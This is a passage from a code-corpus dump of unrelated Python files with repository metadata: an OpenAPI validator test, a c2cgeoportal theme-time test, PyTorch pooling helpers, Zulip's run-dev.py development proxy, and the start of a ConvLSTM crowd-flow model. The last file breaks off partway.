"""Calling with non-existing file should sys.exit."""
testargs = ['i_dont_exist.yaml']
with pytest.raises(SystemExit):
main(testargs)
def test_schema_stdin():
"""Test schema from STDIN"""
spes_path = './tests/integration/data/v3.0/petstore.yaml'
with open(spes_path, 'r') as spec_file:
spec_lines = spec_file.readlines()
spec_io = StringIO("".join(spec_lines))
testargs = ['-']
with mock.patch('openapi_spec_validator.__main__.sys.stdin', spec_io):
main(testargs)
| 30.19802
| 74
| 0.664262
|
4bf5b9c072ffae1ef2a97fc649387cc1e024449b
| 15,782
|
py
|
Python
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 43
|
2015-02-16T06:56:25.000Z
|
2021-09-12T17:49:16.000Z
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 3,227
|
2015-01-05T10:30:59.000Z
|
2022-03-31T03:25:39.000Z
|
geoportal/tests/functional/test_themes_time.py
|
rbovard/c2cgeoportal
|
61b7a4fc98f686f9b7d4c5fda7bb4c5cc09f8de8
|
[
"BSD-2-Clause-FreeBSD"
] | 57
|
2015-01-29T08:32:12.000Z
|
2022-03-16T07:07:33.000Z
|
# Copyright (c) 2013-2019, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
# pylint: disable=missing-docstring,attribute-defined-outside-init,protected-access
import re
import typing
from unittest import TestCase
import sqlalchemy.ext.declarative
import transaction
from geoalchemy2 import Geometry
from pyramid import testing
from sqlalchemy import Column
from sqlalchemy.types import DateTime, Integer, Unicode
from tests.functional import create_default_ogcserver, create_dummy_request, mapserv_url
from tests.functional import setup_common as setup_module # noqa
from tests.functional import teardown_common as teardown_module # noqa
Base: typing.Any = sqlalchemy.ext.declarative.declarative_base()
class PointTest(Base): # type: ignore
__tablename__ = "testpointtime"
__table_args__ = {"schema": "geodata"}
id = Column(Integer, primary_key=True)
geom = Column(Geometry("POINT", srid=21781))
name = Column(Unicode)
time = Column(DateTime)
class TestThemesTimeView(TestCase):
def setup_method(self, _):
# Always see the diff
# https://docs.python.org/2/library/unittest.html#unittest.TestCase.maxDiff
self.maxDiff = None
from c2cgeoportal_commons.models import DBSession
from c2cgeoportal_commons.models.main import Interface, LayerGroup, LayerWMS, LayerWMTS, Theme
DBSession.query(PointTest).delete()
main = Interface(name="desktop")
ogc_server = create_default_ogcserver()
layer_wms_1 = LayerWMS(name="__test_layer_time_1", public=True)
layer_wms_1.layer = "test_wmstime"
layer_wms_1.time_mode = "value"
layer_wms_1.interfaces = [main]
layer_wms_1.ogc_server = ogc_server
layer_wms_2 = LayerWMS(name="__test_layer_time_2", public=True)
layer_wms_2.layer = "test_wmstime2"
layer_wms_2.time_mode = "value"
layer_wms_2.interfaces = [main]
layer_wms_2.ogc_server = ogc_server
layer_wmts = LayerWMTS(name="__test_layer_wmts", public=True)
layer_wmts.url = "http://example.com/1.0.0/WMTSCapabilities.xml"
layer_wmts.layer = "map"
layer_wmts.interfaces = [main]
layer_wms_group_1 = LayerWMS(name="__test_layer_time_group_1", public=True)
layer_wms_group_1.layer = "test_wmstimegroup"
layer_wms_group_1.time_mode = "range"
layer_wms_group_1.time_widget = "datepicker"
layer_wms_group_1.interfaces = [main]
layer_wms_group_1.ogc_server = ogc_server
layer_wms_group_2 = LayerWMS(name="__test_layer_time_group_2", public=True)
layer_wms_group_2.layer = "test_wmstimegroup"
layer_wms_group_2.time_mode = "value"
layer_wms_group_2.interfaces = [main]
layer_wms_group_2.ogc_server = ogc_server
layer_wms_no_time = LayerWMS(name="__test_layer_without_time_info", public=True)
layer_wms_no_time.layer = "test_wmsfeatures"
layer_wms_no_time.time_mode = "value"
layer_wms_no_time.interfaces = [main]
layer_wms_no_time.ogc_server = ogc_server
# Expect merge of times
layer_group_1 = LayerGroup(name="__test_layer_group_1")
layer_group_1.children = [layer_wms_1, layer_wms_2]
# Expect time from layer.
layer_group_2 = LayerGroup(name="__test_layer_group_2")
layer_group_2.children = [layer_wms_1]
# Expect merge of wms 1 and 2, layer_wms_group_1 excluded and in errors as its mode don't match.
layer_group_3 = LayerGroup(name="__test_layer_group_3")
layer_group_3.children = [layer_wms_1, layer_wms_2, layer_wms_group_1]
# Expect time from layers in wms layer group
layer_group_4 = LayerGroup(name="__test_layer_group_4")
layer_group_4.children = [layer_wms_group_1]
# Expect merge of wms 1 and 2 and group.
layer_group_5 = LayerGroup(name="__test_layer_group_5")
layer_group_5.children = [layer_wms_1, layer_wms_2, layer_wms_group_2]
# Expect individual layers
layer_group_6 = LayerGroup(name="__test_layer_group_6")
layer_group_6.children = [layer_wms_1, layer_wms_2, layer_wmts]
# Expect layer_wms_no_time excluded and in errors as it has no time info
layer_group_7 = LayerGroup(name="__test_layer_group_7")
layer_group_7.children = [layer_wms_1, layer_wms_no_time]
theme = Theme(name="__test_theme")
theme.interfaces = [main]
theme.children = [
layer_group_1,
layer_group_2,
layer_group_3,
layer_group_4,
layer_group_5,
layer_group_6,
layer_group_7,
]
DBSession.add_all([theme])
transaction.commit()
def teardown_method(self, _):
testing.tearDown()
from c2cgeoportal_commons.models import DBSession
from c2cgeoportal_commons.models.main import Interface, OGCServer, TreeItem
for item in DBSession.query(TreeItem).all():
DBSession.delete(item)
DBSession.query(Interface).filter(Interface.name == "main").delete()
DBSession.query(OGCServer).delete()
transaction.commit()
DBSession.query(PointTest).delete()
@staticmethod
def _create_request_obj(params=None, **kwargs):
if params is None:
params = {}
request = create_dummy_request(**kwargs)
request.route_url = lambda url, **kwargs: mapserv_url
request.params = params
return request
def _create_theme_obj(self, **kwargs):
from c2cgeoportal_geoportal.views.theme import Theme
return Theme(self._create_request_obj(**kwargs))
def _only(self, item, attributes=None):
if attributes is None:
attributes = ["name", "time"]
result = {}
for attribute in attributes:
if attribute in item:
result[attribute] = item[attribute]
if "children" in item:
result["children"] = [self._only(i, attributes) for i in item["children"]]
return result
@staticmethod
def _get_filtered_errors(themes):
errors = themes["errors"]
regex = re.compile(
r"The (GeoMapFish|WMS) layer name '[a-z0-9_.]*', cannot be two times in the same block \(first level group\)."
)
errors = [e for e in errors if not regex.match(e)]
return set(errors)
def test_time(self):
theme_view = self._create_theme_obj()
themes = theme_view.themes()
self.assertEqual(
set(themes["errors"]),
{
"Error while handling time for layer '__test_layer_time_group_1': Could not mix time mode 'range' and 'value'",
"Error: time layer '__test_layer_without_time_info' has no time information in capabilities",
},
)
self.assertEqual(
[self._only(t) for t in themes["themes"]],
[
{
"name": "__test_theme",
"children": [
{
"name": "__test_layer_group_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [{"name": "__test_layer_time_1"}, {"name": "__test_layer_time_2"}],
},
{
"name": "__test_layer_group_2",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
}
],
},
{
"name": "__test_layer_group_3",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [
{"name": "__test_layer_time_1"},
{"name": "__test_layer_time_2"},
],
},
{
"name": "__test_layer_group_4",
"children": [
{
"name": "__test_layer_time_group_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "range",
"resolution": "year",
"widget": "datepicker",
},
}
],
},
{
"name": "__test_layer_group_5",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
"children": [
{"name": "__test_layer_time_1"},
{"name": "__test_layer_time_2"},
{"name": "__test_layer_time_group_2"},
],
},
{
"name": "__test_layer_group_6",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
{
"name": "__test_layer_time_2",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2020-01-01T00:00:00Z",
"minDefValue": "2015-01-01T00:00:00Z",
"minValue": "2015-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
{"name": "__test_layer_wmts"},
],
},
{
"name": "__test_layer_group_7",
"children": [
{
"name": "__test_layer_time_1",
"time": {
"maxDefValue": None,
"interval": (1, 0, 0, 0),
"maxValue": "2010-01-01T00:00:00Z",
"minDefValue": "2000-01-01T00:00:00Z",
"minValue": "2000-01-01T00:00:00Z",
"mode": "value",
"resolution": "year",
"widget": "slider",
},
},
],
},
],
}
],
)
| 43.961003
| 127
| 0.479534
|
a63f0ab1248ff1fee17b0eb537c9e5cafac30672
| 2,942
|
py
|
Python
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 8
|
2021-10-12T05:39:20.000Z
|
2022-03-31T10:55:01.000Z
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 1
|
2022-03-30T19:23:42.000Z
|
2022-03-30T19:23:42.000Z
|
src/models/layers/pool2d_same.py
|
Alicegaz/torchok
|
7b8f95df466a25b1ad8ee93bed1a3c7516440cf4
|
[
"Apache-2.0"
] | 5
|
2021-11-17T07:38:28.000Z
|
2022-01-31T10:46:36.000Z
|
""" AvgPool2d w/ Same Padding
Hacked together by / Copyright 2020 Ross Wightman
"""
from typing import List
import torch.nn as nn
import torch.nn.functional as F
from .helpers import to_2tuple
from .padding import pad_same, get_padding_value
def avg_pool2d_same(x, kernel_size: List[int], stride: List[int], padding: List[int] = (0, 0),
ceil_mode: bool = False, count_include_pad: bool = True):
# FIXME how to deal with count_include_pad vs not for external padding?
x = pad_same(x, kernel_size, stride)
return F.avg_pool2d(x, kernel_size, stride, (0, 0), ceil_mode, count_include_pad)
class AvgPool2dSame(nn.AvgPool2d):
""" Tensorflow like 'SAME' wrapper for 2D average pooling
"""
def __init__(self, kernel_size: int, stride=None, padding=0, ceil_mode=False, count_include_pad=True):
kernel_size = to_2tuple(kernel_size)
stride = to_2tuple(stride)
super(AvgPool2dSame, self).__init__(kernel_size, stride, (0, 0), ceil_mode, count_include_pad)
def forward(self, x):
return avg_pool2d_same(
x, self.kernel_size, self.stride, self.padding, self.ceil_mode, self.count_include_pad)
def max_pool2d_same(
x, kernel_size: List[int], stride: List[int], padding: List[int] = (0, 0),
dilation: List[int] = (1, 1), ceil_mode: bool = False):
x = pad_same(x, kernel_size, stride, value=-float('inf'))
return F.max_pool2d(x, kernel_size, stride, (0, 0), dilation, ceil_mode)
class MaxPool2dSame(nn.MaxPool2d):
""" Tensorflow like 'SAME' wrapper for 2D max pooling
"""
def __init__(self, kernel_size: int, stride=None, padding=0, dilation=1, ceil_mode=False, count_include_pad=True):
kernel_size = to_2tuple(kernel_size)
stride = to_2tuple(stride)
dilation = to_2tuple(dilation)
super(MaxPool2dSame, self).__init__(kernel_size, stride, (0, 0), dilation, ceil_mode, count_include_pad)
def forward(self, x):
return max_pool2d_same(x, self.kernel_size, self.stride, self.padding, self.dilation, self.ceil_mode)
def create_pool2d(pool_type, kernel_size, stride=None, **kwargs):
stride = stride or kernel_size
padding = kwargs.pop('padding', '')
padding, is_dynamic = get_padding_value(padding, kernel_size, stride=stride, **kwargs)
if is_dynamic:
if pool_type == 'avg':
return AvgPool2dSame(kernel_size, stride=stride, **kwargs)
elif pool_type == 'max':
return MaxPool2dSame(kernel_size, stride=stride, **kwargs)
else:
assert False, f'Unsupported pool type {pool_type}'
else:
if pool_type == 'avg':
return nn.AvgPool2d(kernel_size, stride=stride, padding=padding, **kwargs)
elif pool_type == 'max':
return nn.MaxPool2d(kernel_size, stride=stride, padding=padding, **kwargs)
else:
assert False, f'Unsupported pool type {pool_type}'
| 39.756757
| 118
| 0.680489
|
faf177217324f725290d60a1cefe9fc1930b55fc
| 13,048
|
py
|
Python
|
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | 2
|
2020-11-12T12:28:46.000Z
|
2020-11-16T11:17:46.000Z
|
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | null | null | null |
tools/run-dev.py
|
rohanj-02/zulip
|
fc0488fdb1b83bffea4a300656d7bb7f5e6ab581
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import os
import pwd
import signal
import subprocess
import sys
from typing import Any, Callable, Generator, List, Sequence
from urllib.parse import urlunparse
# check for the venv
from lib import sanity_check
sanity_check.check_venv(__file__)
from tornado import gen, httpclient, httputil, web
from tornado.ioloop import IOLoop
TOOLS_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.dirname(TOOLS_DIR))
from tools.lib.test_script import assert_provisioning_status_ok
if "posix" in os.name and os.geteuid() == 0:
raise RuntimeError("run-dev.py should not be run as root.")
DESCRIPTION = """
Starts the app listening on localhost, for local development.
This script launches the Django and Tornado servers, then runs a reverse proxy
which serves to both of them. After it's all up and running, browse to
http://localhost:9991/
Note that, while runserver and runtornado have the usual auto-restarting
behavior, the reverse proxy itself does *not* automatically restart on changes
to this file.
"""
parser = argparse.ArgumentParser(
description=DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("--test", action="store_true", help="Use the testing database and ports")
parser.add_argument("--minify", action="store_true", help="Minifies assets for testing in dev")
parser.add_argument("--interface", help="Set the IP or hostname for the proxy to listen on")
parser.add_argument(
"--no-clear-memcached",
action="store_false",
dest="clear_memcached",
help="Do not clear memcached on startup",
)
parser.add_argument("--streamlined", action="store_true", help="Avoid thumbor, etc.")
parser.add_argument("--force", action="store_true", help="Run command despite possible problems.")
parser.add_argument(
"--enable-tornado-logging",
action="store_true",
help="Enable access logs from tornado proxy server.",
)
options = parser.parse_args()
assert_provisioning_status_ok(options.force)
if options.interface is None:
user_id = os.getuid()
user_name = pwd.getpwuid(user_id).pw_name
if user_name in ["vagrant", "zulipdev"]:
# In the Vagrant development environment, we need to listen on
# all ports, and it's safe to do so, because Vagrant is only
# exposing certain guest ports (by default just 9991) to the
# host. The same argument applies to the remote development
# servers using username "zulipdev".
options.interface = None
else:
# Otherwise, only listen to requests on localhost for security.
options.interface = "127.0.0.1"
elif options.interface == "":
options.interface = None
runserver_args: List[str] = []
base_port = 9991
if options.test:
base_port = 9981
settings_module = "zproject.test_settings"
# Don't auto-reload when running Puppeteer tests
runserver_args = ["--noreload"]
else:
settings_module = "zproject.settings"
manage_args = [f"--settings={settings_module}"]
os.environ["DJANGO_SETTINGS_MODULE"] = settings_module
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from scripts.lib.zulip_tools import CYAN, ENDC, FAIL
proxy_port = base_port
django_port = base_port + 1
tornado_port = base_port + 2
webpack_port = base_port + 3
thumbor_port = base_port + 4
os.chdir(os.path.join(os.path.dirname(__file__), ".."))
# Clean up stale .pyc files etc.
subprocess.check_call("./tools/clean-repo")
if options.clear_memcached:
subprocess.check_call("./scripts/setup/flush-memcached")
# Set up a new process group, so that we can later kill run{server,tornado}
# and all of the processes they spawn.
os.setpgrp()
# Save pid of parent process to the pid file. It can be used later by
# tools/stop-run-dev to kill the server without having to find the
# terminal in question.
if options.test:
pid_file_path = os.path.join(os.path.join(os.getcwd(), "var/puppeteer/run_dev.pid"))
else:
pid_file_path = os.path.join(os.path.join(os.getcwd(), "var/run/run_dev.pid"))
# Required for compatibility python versions.
if not os.path.exists(os.path.dirname(pid_file_path)):
os.makedirs(os.path.dirname(pid_file_path))
with open(pid_file_path, "w+") as f:
f.write(str(os.getpgrp()) + "\n")
def server_processes() -> List[List[str]]:
main_cmds = [
[
"./manage.py",
"rundjangoserver",
*manage_args,
*runserver_args,
f"127.0.0.1:{django_port}",
],
[
"env",
"PYTHONUNBUFFERED=1",
"./manage.py",
"runtornado",
*manage_args,
f"127.0.0.1:{tornado_port}",
],
]
if options.streamlined:
# The streamlined operation allows us to do many
# things, but search/thumbor/etc. features won't work.
return main_cmds
other_cmds = [
["./manage.py", "process_queue", "--all", *manage_args],
[
"env",
"PGHOST=127.0.0.1", # Force password authentication using .pgpass
"./puppet/zulip/files/postgresql/process_fts_updates",
"--quiet",
],
["./manage.py", "deliver_scheduled_messages"],
[
"/srv/zulip-thumbor-venv/bin/thumbor",
"--conf=./zthumbor/thumbor_settings.py",
f"--port={thumbor_port}",
],
]
# NORMAL (but slower) operation:
return main_cmds + other_cmds
def do_one_time_webpack_compile() -> None:
# We just need to compile webpack assets once at startup, not run a daemon,
# in test mode. Additionally, webpack-dev-server doesn't support running 2
# copies on the same system, so this model lets us run the Puppeteer tests
# with a running development server.
subprocess.check_call(["./tools/webpack", "--quiet", "--test"])
def start_webpack_watcher() -> "subprocess.Popen[bytes]":
webpack_cmd = ["./tools/webpack", "--watch", f"--port={webpack_port}"]
if options.minify:
webpack_cmd.append("--minify")
if options.interface is None:
# If interface is None and we're listening on all ports, we also need
# to disable the webpack host check so that webpack will serve assets.
webpack_cmd.append("--disable-host-check")
if options.interface:
webpack_cmd.append(f"--host={options.interface}")
else:
webpack_cmd.append("--host=0.0.0.0")
return subprocess.Popen(webpack_cmd)
def transform_url(protocol: str, path: str, query: str, target_port: int, target_host: str) -> str:
# generate url with target host
host = ":".join((target_host, str(target_port)))
# Here we are going to rewrite the path a bit so that it is in parity with
# what we will have for production
if path.startswith("/thumbor"):
path = path[len("/thumbor") :]
newpath = urlunparse((protocol, host, path, "", query, ""))
return newpath
@gen.engine
def fetch_request(
url: str, callback: Any, **kwargs: Any
) -> "Generator[Callable[..., Any], Any, None]":
# use large timeouts to handle polling requests
req = httpclient.HTTPRequest(
url,
connect_timeout=240.0,
request_timeout=240.0,
decompress_response=False,
**kwargs,
)
client = httpclient.AsyncHTTPClient()
# wait for response
response = yield gen.Task(client.fetch, req)
callback(response)
class BaseHandler(web.RequestHandler):
# target server ip
target_host: str = "127.0.0.1"
# target server port
target_port: int
def _add_request_headers(
self,
exclude_lower_headers_list: Sequence[str] = [],
) -> httputil.HTTPHeaders:
headers = httputil.HTTPHeaders()
for header, v in self.request.headers.get_all():
if header.lower() not in exclude_lower_headers_list:
headers.add(header, v)
return headers
def get(self) -> None:
pass
def head(self) -> None:
pass
def post(self) -> None:
pass
def put(self) -> None:
pass
def patch(self) -> None:
pass
def options(self) -> None:
pass
def delete(self) -> None:
pass
def handle_response(self, response: Any) -> None:
if response.error and not isinstance(response.error, httpclient.HTTPError):
self.set_status(500)
self.write("Internal server error:\n" + str(response.error))
else:
self.set_status(response.code, response.reason)
self._headers = httputil.HTTPHeaders() # clear tornado default header
for header, v in response.headers.get_all():
# some header appear multiple times, eg 'Set-Cookie'
self.add_header(header, v)
if response.body:
self.write(response.body)
self.finish()
@web.asynchronous
def prepare(self) -> None:
if "X-REAL-IP" not in self.request.headers:
self.request.headers["X-REAL-IP"] = self.request.remote_ip
if "X-FORWARDED_PORT" not in self.request.headers:
self.request.headers["X-FORWARDED-PORT"] = str(proxy_port)
url = transform_url(
self.request.protocol,
self.request.path,
self.request.query,
self.target_port,
self.target_host,
)
try:
fetch_request(
url=url,
callback=self.handle_response,
method=self.request.method,
headers=self._add_request_headers(["upgrade-insecure-requests"]),
follow_redirects=False,
body=getattr(self.request, "body"),
allow_nonstandard_methods=True,
)
except httpclient.HTTPError as e:
if hasattr(e, "response") and e.response:
self.handle_response(e.response)
else:
self.set_status(500)
self.write("Internal server error:\n" + str(e))
self.finish()
class WebPackHandler(BaseHandler):
target_port = webpack_port
class DjangoHandler(BaseHandler):
target_port = django_port
class TornadoHandler(BaseHandler):
target_port = tornado_port
class ThumborHandler(BaseHandler):
target_port = thumbor_port
class ErrorHandler(BaseHandler):
@web.asynchronous
def prepare(self) -> None:
print(FAIL + "Unexpected request: " + ENDC, self.request.path)
self.set_status(500)
self.write("path not supported")
self.finish()
def using_thumbor() -> bool:
return not options.streamlined
class Application(web.Application):
def __init__(self, enable_logging: bool = False) -> None:
handlers = [
(r"/json/events.*", TornadoHandler),
(r"/api/v1/events.*", TornadoHandler),
(r"/webpack.*", WebPackHandler),
(r"/thumbor.*", ThumborHandler if using_thumbor() else ErrorHandler),
(r"/.*", DjangoHandler),
]
super().__init__(handlers, enable_logging=enable_logging)
def log_request(self, handler: BaseHandler) -> None:
if self.settings["enable_logging"]:
super().log_request(handler)
def on_shutdown() -> None:
IOLoop.instance().stop()
def shutdown_handler(*args: Any, **kwargs: Any) -> None:
io_loop = IOLoop.instance()
if io_loop._callbacks:
io_loop.call_later(1, shutdown_handler)
else:
io_loop.stop()
def print_listeners() -> None:
external_host = os.getenv("EXTERNAL_HOST", f"localhost:{proxy_port}")
print(f"\nStarting Zulip on:\n\n\t{CYAN}http://{external_host}/{ENDC}\n\nInternal ports:")
ports = [
(proxy_port, "Development server proxy (connect here)"),
(django_port, "Django"),
(tornado_port, "Tornado"),
]
if not options.test:
ports.append((webpack_port, "webpack"))
if using_thumbor():
ports.append((thumbor_port, "Thumbor"))
for port, label in ports:
print(f" {port}: {label}")
print()
children = []
try:
if options.test:
do_one_time_webpack_compile()
else:
children.append(start_webpack_watcher())
for cmd in server_processes():
children.append(subprocess.Popen(cmd))
app = Application(enable_logging=options.enable_tornado_logging)
try:
app.listen(proxy_port, address=options.interface)
except OSError as e:
if e.errno == 98:
print("\n\nERROR: You probably have another server running!!!\n\n")
raise
print_listeners()
ioloop = IOLoop.instance()
for s in (signal.SIGINT, signal.SIGTERM):
signal.signal(s, shutdown_handler)
ioloop.start()
finally:
for child in children:
child.terminate()
print("Waiting for children to stop...")
for child in children:
child.wait()
# Remove pid file when development server closed correctly.
os.remove(pid_file_path)
| 30.846336
| 99
| 0.647379
|
a6f81b46c8b717bf9fb36f8c5ed31ec53aebe7c1
| 10,446
|
py
|
Python
|
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | 4
|
2021-09-07T09:29:43.000Z
|
2022-03-28T07:18:16.000Z
|
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | null | null | null |
workBousaiOSA_baseline/predflowio/predflowio_PCRNB.py
|
deepkashiwa20/DeepCrowd
|
847bcc20ca36b521eead4ededa5d11b2fd2af30a
|
[
"MIT"
] | 2
|
2021-06-18T01:28:16.000Z
|
2021-08-10T01:24:49.000Z
|
import sys
import shutil
import os
import time
from datetime import datetime, date, timedelta
import pandas as pd
import numpy as np
import h5py
from copy import copy
from keras.models import load_model, Model, Sequential
from keras.layers import Input, Activation, Flatten, Dense,Reshape, Concatenate, Add, Lambda, Layer, add, multiply
from keras.layers.convolutional_recurrent import ConvLSTM2D
from keras.layers.convolutional import Conv2D
from keras.callbacks import CSVLogger, EarlyStopping, ModelCheckpoint, LearningRateScheduler, Callback
import keras.backend as K
from Param import *
def getXSYS_CPT_D(mode, allData, trainData, dayinfo):
len_c, len_p, len_t = TIMESTEP, 1, 1
interval_p, interval_t = 1, 7
stepC = list(range(1, len_c + 1))
periods, trends = [interval_p * DAYTIMESTEP * i for i in range(1, len_p + 1)], \
[interval_t * DAYTIMESTEP * i for i in range(1, len_t + 1)]
stepP, stepT = [], []
for p in periods:
stepP.extend(list(range(p, p + len_c)))
for t in trends:
stepT.extend(list(range(t, t + len_c)))
depends = [stepC, stepP, stepT]
if mode == 'train':
start = max(len_c, interval_p * DAYTIMESTEP * len_p, interval_t * DAYTIMESTEP * len_t)
end = trainData.shape[0]
elif mode == 'test':
start = trainData.shape[0] + len_c
end = allData.shape[0]
else:
assert False, 'invalid mode...'
XC, XP, XT, YS, YD = [], [], [], [], []
for i in range(start, end):
x_c = [allData[i - j][np.newaxis, :, :, :] for j in depends[0]]
x_p = [allData[i - j][np.newaxis, :, :, :] for j in depends[1]]
x_t = [allData[i - j][np.newaxis, :, :, :] for j in depends[2]]
x_c = np.concatenate(x_c, axis=0)
x_p = np.concatenate(x_p, axis=0)
x_t = np.concatenate(x_t, axis=0)
x_c = x_c[::-1, :, :, :]
x_p = x_p[::-1, :, :, :]
x_t = x_t[::-1, :, :, :]
d = dayinfo[i]
y = allData[i]
XC.append(x_c)
XP.append(x_p)
XT.append(x_t)
YS.append(y)
YD.append(d)
XC, XP, XT, YS, YD = np.array(XC), np.array(XP), np.array(XT), np.array(YS), np.array(YD)
return XC, XP, XT, YS, YD
##################### PCRN Model ############################
def concat_28(ts):
lst = []
for i in range(14):
lst.append(K.concatenate([ts[:, 2*i,:,:,:], ts[:, 2*i+1,:,:,:]], axis = -1)) # First dimension - sample (batch_size)
return K.concatenate([i[:,np.newaxis,:,:,:] for i in lst], axis = 1) # output_shape needs to be specified when it differs from input_shape
def concat_14(ts):
lst = []
for i in range(7):
lst.append(K.concatenate([ts[:, 2*i,:,:,:], ts[:, 2*i+1,:,:,:]], axis = -1))
return K.concatenate([i[:,np.newaxis,:,:,:] for i in lst], axis = 1)
def ConvLSTMs():
model = Sequential()
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True,
input_shape = (None, HEIGHT, WIDTH, CHANNEL)))
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True))
model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = False))
return model
class Hadamard_fusion(Layer):
def __init__(self, **kwargs):
super(Hadamard_fusion, self).__init__(**kwargs)
def build(self, input_shape):
assert isinstance(input_shape, list)
self.Wc = self.add_weight(name='Wc', shape=(input_shape[0][1:]),
initializer='uniform', trainable=True)
self.Wp = self.add_weight(name='Wp', shape=(input_shape[1][1:]),
initializer='uniform', trainable=True)
super(Hadamard_fusion, self).build(input_shape)
def call(self, x, mask=None):
assert isinstance(x, list)
hct, hallt = x
hft = K.relu(hct*self.Wc + hallt*self.Wp)
return hft
def get_output_shape(self, input_shape):
return input_shape
def getModel(x_dim, meta_dim):
# Input xc, xp, xt --> hct1, hP1, hP2
XC = Input(shape = x_dim)
XP = Input(shape = x_dim)
XT = Input(shape = x_dim)
shared_model = Sequential()
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True, input_shape = x_dim))
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = True))
shared_model.add(ConvLSTM2D(filters = 32, kernel_size = (3, 3),
padding = 'same', return_sequences = False))
hct = shared_model(XC)
hP1 = shared_model(XP)
hP2 = shared_model(XT)
# Weighting based fusion
# daily
concate1 = Concatenate()([hct, hP1])
conv1 = Conv2D(filters = 32, kernel_size = (1, 1), padding = 'same')(concate1)
# weekly
concate2 = Concatenate()([hct, hP2])
conv2 = Conv2D(filters = 32, kernel_size = (1, 1), padding = 'same')(concate2)
x1 = Lambda(lambda x: x[:,:,:,:,np.newaxis])(conv1)
